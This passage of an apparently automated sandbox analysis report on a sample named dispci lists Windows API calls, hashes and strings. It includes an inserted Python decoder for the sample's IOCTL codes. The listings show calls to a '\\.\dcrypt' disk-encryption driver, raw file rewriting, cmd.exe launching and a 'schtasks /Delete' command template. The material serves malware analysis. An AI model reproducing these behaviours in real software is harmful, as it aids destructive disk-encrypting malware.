                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Heap$File$CloseHandleProcess$AllocCreateFreeReadSize
                                              • String ID:
                                              • API String ID: 2825476172-0
                                              • Opcode ID: 0042a32c6ada9344e25a0d0e41feb7d5ee3a0fc6371aa662bb11d5bde5944af1
                                              • Instruction ID: 92b0caa1a7b209a776efa933d19eae2b08fc11cedd774c1276fb26a3cf9fdf7a
                                              • Opcode Fuzzy Hash: 0042a32c6ada9344e25a0d0e41feb7d5ee3a0fc6371aa662bb11d5bde5944af1
                                              • Instruction Fuzzy Hash: C1211276601214BBCB20DBA9EC4CA9FBB7CEB49766F104256F90AD2250DA719A01C7A0
                                              APIs
                                              • TlsGetValue.KERNEL32(?), ref: 00A820BD
                                              • _wcschr.LIBCMT ref: 00A820C8
                                              • _wcschr.LIBCMT ref: 00A820F8
                                              • __snwprintf.LIBCMT ref: 00A8210C
                                              • DeviceIoControl.KERNEL32(00000000,00220040,?,00000298,?,00000298,?,00000000), ref: 00A8213D
                                              • DeviceIoControl.KERNEL32(00000000,0022001C,?,00000298,?,0000022C,?,00000000), ref: 00A82196
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: ControlDevice_wcschr$Value__snwprintf
                                              • String ID: \??\Volume%s
                                              • API String ID: 2726058786-4071929160
                                              • Opcode ID: 8da969f6f69135a1c698e1927b79e102f382a57a28d6f43e56b4622f3e81bac0
                                              • Instruction ID: 0a792ed02b12c5f6632cceddf8dcc79efac19876ac9a019eeb0fbc3ddc5b7408
                                              • Opcode Fuzzy Hash: 8da969f6f69135a1c698e1927b79e102f382a57a28d6f43e56b4622f3e81bac0
                                              • Instruction Fuzzy Hash: D131C531B00218AFDB24EB74CC4AFBAB3B8EF49710F404555F90997191EEB45E44CBA1
                                              APIs
                                              • __aullrem.LIBCMT ref: 00A83BFA
                                              • _malloc.LIBCMT ref: 00A83C40
                                              • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 00A83C63
                                              • ReadFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,00000000,00000000,?,00000000,00000000), ref: 00A83C88
                                              • _memmove.LIBCMT ref: 00A83CA6
                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000), ref: 00A83CBB
                                              • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00000000,?,00000000,00000000), ref: 00A83CD7
                                              • _free.LIBCMT ref: 00A83CEF
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: File$Pointer$ReadWrite__aullrem_free_malloc_memmove
                                              • String ID:
                                              • API String ID: 2931023824-0
                                              • Opcode ID: 77c08e4b1a29db33023865f075ff57961e7b47b6628aab57398c98152f137833
                                              • Instruction ID: 7132c96dff5d564334b5b01a2e6ea9354f394c2bd277547fcf4d43aed5a7b0bf
                                              • Opcode Fuzzy Hash: 77c08e4b1a29db33023865f075ff57961e7b47b6628aab57398c98152f137833
                                              • Instruction Fuzzy Hash: 114182B6A00215ABCF14EF65CC85E9B7B79EB85750F148229FD09AB244D630AE04C7E1
                                              APIs
                                              • __aullrem.LIBCMT ref: 00A82E65
                                              • _malloc.LIBCMT ref: 00A82EB6
                                              • SetFilePointer.KERNEL32(?,00000000,?,00000000), ref: 00A82EDE
                                              • ReadFile.KERNEL32(?,00000000,-00000200,?,00000000,?,00000000,?,00000000), ref: 00A82F01
                                              • _memmove.LIBCMT ref: 00A82F29
                                              • _free.LIBCMT ref: 00A82F35
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: File$PointerRead__aullrem_free_malloc_memmove
                                              • String ID:
                                              • API String ID: 2967271196-0
                                              • Opcode ID: 0d0a78af65c929136ad871185afe13d42db0387c9c349a2861e15d1f3d79d5ee
                                              • Instruction ID: 3bb6c44538829af49bea25758bddd96c5e311bd07d8ef1ac63e3dbbfab8962e7
                                              • Opcode Fuzzy Hash: 0d0a78af65c929136ad871185afe13d42db0387c9c349a2861e15d1f3d79d5ee
                                              • Instruction Fuzzy Hash: 1B419671E00118AFDB14DF99D884ABEB7B9EF84320F15817AED199B791E7349E10C790
                                              APIs
                                              • __aullrem.LIBCMT ref: 00A83B0A
                                              • _malloc.LIBCMT ref: 00A83B50
                                              • SetFilePointer.KERNEL32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A83B73
                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,00000000,00000000,00000000,?,00000000), ref: 00A83B93
                                              • _memmove.LIBCMT ref: 00A83BBC
                                              • _free.LIBCMT ref: 00A83BC5
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: File$PointerRead__aullrem_free_malloc_memmove
                                              • String ID:
                                              • API String ID: 2967271196-0
                                              • Opcode ID: 56ef61acfd3c8f3bc4ecd12629473f41f83d6d7a18dad5df5cb99b0964898626
                                              • Instruction ID: a3f1dc365f48f9c158fb9e062739d4d52d92c2afc471c79a65bca96bfcf2758a
                                              • Opcode Fuzzy Hash: 56ef61acfd3c8f3bc4ecd12629473f41f83d6d7a18dad5df5cb99b0964898626
                                              • Instruction Fuzzy Hash: 6A31C7B7A00215ABCF14EF69DC8599A77B9EB94720F14826AFC099B240D670EE01C7E0
                                              APIs
                                              • __getptd.LIBCMT ref: 00A89718
                                                • Part of subcall function 00A8A0B6: __getptd_noexit.LIBCMT ref: 00A8A0B9
                                                • Part of subcall function 00A8A0B6: __amsg_exit.LIBCMT ref: 00A8A0C6
                                              • __amsg_exit.LIBCMT ref: 00A89738
                                              • __lock.LIBCMT ref: 00A89748
                                              • InterlockedDecrement.KERNEL32(?), ref: 00A89765
                                              • _free.LIBCMT ref: 00A89778
                                              • InterlockedIncrement.KERNEL32(020717F0), ref: 00A89790
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                              • String ID:
                                              • API String ID: 3470314060-0
                                              • Opcode ID: 50ea380a98c8265d308fe57b945bdf420a0f089f4bfa96fbed80b256f2e78b94
                                              • Instruction ID: d801008abbef366dc23799c18eab194f6cde8cfe92e248975015cd03b283cea3
                                              • Opcode Fuzzy Hash: 50ea380a98c8265d308fe57b945bdf420a0f089f4bfa96fbed80b256f2e78b94
                                              • Instruction Fuzzy Hash: B2019232E15A11ABCB11FFA59A4676FB7A0BF01720F194106F810A72A1CF389942CBD2
                                              APIs
                                                • Part of subcall function 00A85910: GetLocalTime.KERNEL32(?), ref: 00A8592B
                                                • Part of subcall function 00A85910: SystemTimeToFileTime.KERNEL32(?,?), ref: 00A8593F
                                                • Part of subcall function 00A85910: FileTimeToSystemTime.KERNEL32(?,?), ref: 00A85979
                                                • Part of subcall function 00A85910: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00A8598B
                                                • Part of subcall function 00A85910: PathAppendW.SHLWAPI(?,?), ref: 00A859F8
                                                • Part of subcall function 00A857B0: _vswprintf_s.LIBCMT ref: 00A857DB
                                                • Part of subcall function 00A85810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00A8585A
                                                • Part of subcall function 00A85810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00A85870
                                                • Part of subcall function 00A85810: lstrcatW.KERNEL32(?,\cmd.exe), ref: 00A85886
                                                • Part of subcall function 00A85810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00A858EE
                                              • WaitForSingleObject.KERNEL32(?,00007530), ref: 00A85ACE
                                              • WaitForSingleObject.KERNEL32(?,00007530), ref: 00A85B2C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Time$System$DirectoryFileObjectSingleWait$AppendCreateEnvironmentLocalPathProcessVariable_vswprintf_slstrcat
                                              • String ID: %ws_%u$schtasks /Delete /F /TN %ws$viserion
                                              • API String ID: 1242734776-1187404337
                                              • Opcode ID: 9e92a85ae973f7433d45191673fa7197a57ef98889facbe84670bd267da0f90e
                                              • Instruction ID: 57724689e1d5134683775ee6950169e3c205940b2ea2cb9da9e11db87975335f
                                              • Opcode Fuzzy Hash: 9e92a85ae973f7433d45191673fa7197a57ef98889facbe84670bd267da0f90e
                                              • Instruction Fuzzy Hash: B821B6A0F9070467D610BA30DCC3EAB7295EB80750F404939BE445B2D1E975AD0D83E2
                                              APIs
                                                • Part of subcall function 00A839E0: __snwprintf.LIBCMT ref: 00A83A0A
                                                • Part of subcall function 00A839E0: _malloc.LIBCMT ref: 00A83A11
                                                • Part of subcall function 00A839E0: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00A83A39
                                                • Part of subcall function 00A839E0: _free.LIBCMT ref: 00A83AD6
                                              • _malloc.LIBCMT ref: 00A833C1
                                              • CloseHandle.KERNEL32 ref: 00A8350F
                                              • _free.LIBCMT ref: 00A83516
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: _free_malloc$CloseCreateFileHandle__snwprintf
                                              • String ID:
                                              • API String ID: 496446412-0
                                              • Opcode ID: fb8f33431c96ca855bfd9df895a676f1cf09f173b257959092ad28fe5115883e
                                              • Instruction ID: c6ec152f3a39a292fc75e3e27716ea9d4784c789627a60f4634fdd3ed72ee92f
                                              • Opcode Fuzzy Hash: fb8f33431c96ca855bfd9df895a676f1cf09f173b257959092ad28fe5115883e
                                              • Instruction Fuzzy Hash: 7941D6F3D0021C9BDF21EB54CC81BEA7378EB84710F1581F9EA0967242D675AF858BA5
                                              APIs
                                                • Part of subcall function 00A839E0: __snwprintf.LIBCMT ref: 00A83A0A
                                                • Part of subcall function 00A839E0: _malloc.LIBCMT ref: 00A83A11
                                                • Part of subcall function 00A839E0: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00A83A39
                                                • Part of subcall function 00A839E0: _free.LIBCMT ref: 00A83AD6
                                              • DeviceIoControl.KERNEL32(?,000700A0,00000000,00000000,?,00000028,?,00000000), ref: 00A8269B
                                              • __aulldiv.LIBCMT ref: 00A826E5
                                              • __aulldiv.LIBCMT ref: 00A82702
                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000,?,00000000,?,000700A0,00000000), ref: 00A827D2
                                              • _free.LIBCMT ref: 00A827D9
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: __aulldiv_free$CloseControlCreateDeviceFileHandle__snwprintf_malloc
                                              • String ID:
                                              • API String ID: 1280953716-0
                                              • Opcode ID: 685921b9f98a250adcbe28b15d6a3953ccbee04dd611c6b51b501db1b3806b7f
                                              • Instruction ID: 8037e9904bade6a2e253b30b67b487a8127f043ef06cee78393c480696f20dab
                                              • Opcode Fuzzy Hash: 685921b9f98a250adcbe28b15d6a3953ccbee04dd611c6b51b501db1b3806b7f
                                              • Instruction Fuzzy Hash: 504146B5D011149FDB24EF25CC89BBBB3B9EB84710F1541E9B809A7240D734AE80CF60
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000040), ref: 00A8539B
                                                • Part of subcall function 00A82020: TlsGetValue.KERNEL32(?), ref: 00A8202B
                                                • Part of subcall function 00A82020: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A82043
                                              • VirtualLock.KERNEL32(?,00000104), ref: 00A853D9
                                                • Part of subcall function 00A82340: VirtualAlloc.KERNEL32(00000000,00000298,00003000,00000040), ref: 00A8235D
                                                • Part of subcall function 00A82340: TlsGetValue.KERNEL32(?), ref: 00A82370
                                                • Part of subcall function 00A82340: CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A82388
                                                • Part of subcall function 00A82340: TlsSetValue.KERNEL32(?,00000000), ref: 00A8239D
                                                • Part of subcall function 00A82340: DeviceIoControl.KERNEL32(00000000,00220060,?,00000008,00000000,00000000,?,00000000), ref: 00A823B9
                                                • Part of subcall function 00A82340: GetLastError.KERNEL32 ref: 00A823C3
                                                • Part of subcall function 00A82340: VirtualLock.KERNEL32(?,00000298), ref: 00A823D6
                                                • Part of subcall function 00A83820: TlsGetValue.KERNEL32(?,00000001,?,?,?,?,00A82463,?), ref: 00A8382D
                                                • Part of subcall function 00A83820: CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,00A82463,?), ref: 00A83845
                                                • Part of subcall function 00A83820: TlsSetValue.KERNEL32(?,00000000,?,?,?,?,00A82463,?), ref: 00A8385A
                                                • Part of subcall function 00A83820: DeviceIoControl.KERNEL32(00000000,00220064,?,00000004,00000000,00000000,?,00000000), ref: 00A83876
                                                • Part of subcall function 00A83820: GetLastError.KERNEL32(?,?,?,?,00A82463,?), ref: 00A83880
                                                • Part of subcall function 00A83820: VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,00A82463,?), ref: 00A83894
                                                • Part of subcall function 00A83820: VirtualUnlock.KERNEL32(?,?,?,?,?,?,00A82463,?), ref: 00A838C2
                                                • Part of subcall function 00A83820: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00A82463,?), ref: 00A838D3
                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000104,?,00000080), ref: 00A85417
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000410,00A9A5B0,00000410,00000000,00000000), ref: 00A85474
                                              • LocalFree.KERNEL32(?), ref: 00A854E6
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Virtual$Value$CreateFile$AllocByteCharControlDeviceErrorFreeLastLockMultiWide$LocalQueryUnlock
                                              • String ID:
                                              • API String ID: 1566722532-0
                                              • Opcode ID: e03ba43e211df4c71bdf52f45e565f94e1f1630d07a3cb9318a47c2f9dfd194c
                                              • Instruction ID: f8ccf174ca2436098a12105fce3534e6fd80e0885b3e9b965f2e7948e032bd44
                                              • Opcode Fuzzy Hash: e03ba43e211df4c71bdf52f45e565f94e1f1630d07a3cb9318a47c2f9dfd194c
                                              • Instruction Fuzzy Hash: 0441F7B1E002186BDB20BB649D43FEA77B9DF54B00F004094FF45AA181EAB0AEC48F90
                                              APIs
                                              • TlsGetValue.KERNEL32(?,0022003C,?,00000298,?,00000298,?,00000000), ref: 00A84D04
                                              • DeviceIoControl.KERNEL32(00000000), ref: 00A84D0B
                                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 00A84D2B
                                              • TlsGetValue.KERNEL32(?,00220034,?,00000298,?,00000298,?,00000000), ref: 00A84D82
                                              • DeviceIoControl.KERNEL32(00000000), ref: 00A84D89
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: ControlDeviceValue$ObjectSingleWait
                                              • String ID:
                                              • API String ID: 4079559193-0
                                              • Opcode ID: d17ea315ea596af771afa39f7165afa70982b3e7dd7abb815cd578ce16738b35
                                              • Instruction ID: 33122cc7d80a3a3e545582dbc0a21f10f66efd4cbb7d124bb9aa62e4a5559d49
                                              • Opcode Fuzzy Hash: d17ea315ea596af771afa39f7165afa70982b3e7dd7abb815cd578ce16738b35
                                              • Instruction Fuzzy Hash: 1331C5727043016BE720EBA9DC86FBB73A9EB89710F044919FA45CB2D1EA709D05C7A5
                                              APIs
                                              • TlsGetValue.KERNEL32(?,0022003C,?,00000298,?,00000298,?,00000000), ref: 00A84D04
                                              • DeviceIoControl.KERNEL32(00000000), ref: 00A84D0B
                                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 00A84D2B
                                              • TlsGetValue.KERNEL32(?,00220034,?,00000298,?,00000298,?,00000000), ref: 00A84D82
                                              • DeviceIoControl.KERNEL32(00000000), ref: 00A84D89
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: ControlDeviceValue$ObjectSingleWait
                                              • String ID:
                                              • API String ID: 4079559193-0
                                              • Opcode ID: f12458f1caf2675bceb48e4761fd1345d6f9cb87fdf157ecfd438dbf94d1cfcf
                                              • Instruction ID: d9a29fe50ebf3039c2b95bcae66da09baf14614366486647117dfb64c5d22a68
                                              • Opcode Fuzzy Hash: f12458f1caf2675bceb48e4761fd1345d6f9cb87fdf157ecfd438dbf94d1cfcf
                                              • Instruction Fuzzy Hash: 04215B72714301AFE724EBA5DC5ABBA77B8EB89B00F044909F646CA291EA749901C761
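Several of the listings above pass raw control codes to DeviceIoControl: 0x700A0 on a handle opened by the CreateFileW subcall, and 0x220060 (8-byte input), 0x220064 (4-byte input), 0x22003C and 0x220034 on a handle to \\.\dcrypt. The bit layout of a control code is fixed by the Windows DDK CTL_CODE macro, so an analyst can decode these without the driver. The decoder below is an added example written for this page, not code from the report; its table of names is mine and deliberately names only what is certain. It shows that 0x700A0 is IOCTL_DISK_GET_DRIVE_GEOMETRY_EX (FILE_DEVICE_DISK, function 0x28, METHOD_BUFFERED), consistent with the __aulldiv calls that follow it in the listing (64-bit size arithmetic on the returned geometry), while the 0x22xxxx codes are FILE_DEVICE_UNKNOWN, the range reserved for third-party drivers, so their meaning comes only from the driver behind \\.\dcrypt and the decoder reports their field values without guessing semantics.

```python
from dataclasses import dataclass

# Field layout of a Windows I/O control code, per the DDK CTL_CODE macro:
#   bits 31..16 device type, bits 15..14 required access,
#   bits 13..2  function number, bits 1..0 transfer method.
METHOD_NAMES = {
    0: "METHOD_BUFFERED",
    1: "METHOD_IN_DIRECT",
    2: "METHOD_OUT_DIRECT",
    3: "METHOD_NEITHER",
}
ACCESS_NAMES = {
    0: "FILE_ANY_ACCESS",
    1: "FILE_READ_ACCESS",
    2: "FILE_WRITE_ACCESS",
    3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS",
}
# Only the two device types that occur in the listings above are named here.
DEVICE_TYPE_NAMES = {
    0x07: "FILE_DEVICE_DISK",
    0x22: "FILE_DEVICE_UNKNOWN",   # range reserved for third-party drivers
}
# Public codes we can name with certainty; everything else stays "unknown".
KNOWN_IOCTLS = {
    0x700A0: "IOCTL_DISK_GET_DRIVE_GEOMETRY_EX",
}
# Control codes as they appear in the DeviceIoControl calls of this report.
REPORT_IOCTLS = [0x700A0, 0x220060, 0x220064, 0x22003C, 0x220034]


@dataclass(frozen=True)
class Ioctl:
    code: int
    device_type: int
    access: int
    function: int
    method: int

    @property
    def name(self) -> str:
        if self.code in KNOWN_IOCTLS:
            return KNOWN_IOCTLS[self.code]
        # Vendor-defined codes cannot be named without the driver's own header.
        return "unknown (vendor-defined)" if self.device_type == 0x22 else "unknown"

    def describe(self) -> str:
        dev = DEVICE_TYPE_NAMES.get(self.device_type, f"0x{self.device_type:X}")
        return (f"0x{self.code:X}: {self.name} [{dev}, function 0x{self.function:X}, "
                f"{METHOD_NAMES[self.method]}, {ACCESS_NAMES[self.access]}]")


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Re-implementation of the DDK CTL_CODE macro, used to cross-check the decoder."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code: int) -> Ioctl:
    """Split a 32-bit control code into its CTL_CODE fields."""
    return Ioctl(
        code=code,
        device_type=(code >> 16) & 0xFFFF,
        access=(code >> 14) & 0x3,
        function=(code >> 2) & 0xFFF,
        method=code & 0x3,
    )


def decode_report_ioctls() -> list:
    """One human-readable line per control code seen in the report."""
    return [decode_ioctl(c).describe() for c in REPORT_IOCTLS]


if __name__ == "__main__":
    for line in decode_report_ioctls():
        print(line)
```

When a sandbox listing shows a FILE_DEVICE_UNKNOWN code, the useful next step is the input and output buffer sizes the listing records beside it (8 and 4 bytes here for 0x220060 and 0x220064), which constrain what the driver-side handler can be consuming.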
                                              APIs
                                              • _malloc.LIBCMT ref: 00A8DDC6
                                                • Part of subcall function 00A85E86: __FF_MSGBANNER.LIBCMT ref: 00A85E9F
                                                • Part of subcall function 00A85E86: __NMSG_WRITE.LIBCMT ref: 00A85EA6
                                                • Part of subcall function 00A85E86: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00A8B13B,?,00000001,?,?,00A89441,00000018,00A95D10,0000000C,00A894D1), ref: 00A85ECB
                                              • _free.LIBCMT ref: 00A8DDD9
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: AllocHeap_free_malloc
                                              • String ID:
                                              • API String ID: 2734353464-0
                                              • Opcode ID: 5e25bb21671f507d3a9fda9f362229b40da1dafecda22ddcca7e49a4cd99ddc7
                                              • Instruction ID: 671aff0bc69f6d169bb3e5893b868d809a7e5bbebf6a644bd1c35170dc4616f4
                                              • Opcode Fuzzy Hash: 5e25bb21671f507d3a9fda9f362229b40da1dafecda22ddcca7e49a4cd99ddc7
                                              • Instruction Fuzzy Hash: 0F11A333905611ABCF327FB4AD0566E3BA5AF553A0F34452AF8589A1A0DF35CD818790
                                              APIs
                                              • __getptd.LIBCMT ref: 00A89E99
                                                • Part of subcall function 00A8A0B6: __getptd_noexit.LIBCMT ref: 00A8A0B9
                                                • Part of subcall function 00A8A0B6: __amsg_exit.LIBCMT ref: 00A8A0C6
                                              • __getptd.LIBCMT ref: 00A89EB0
                                              • __amsg_exit.LIBCMT ref: 00A89EBE
                                              • __lock.LIBCMT ref: 00A89ECE
                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00A89EE2
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
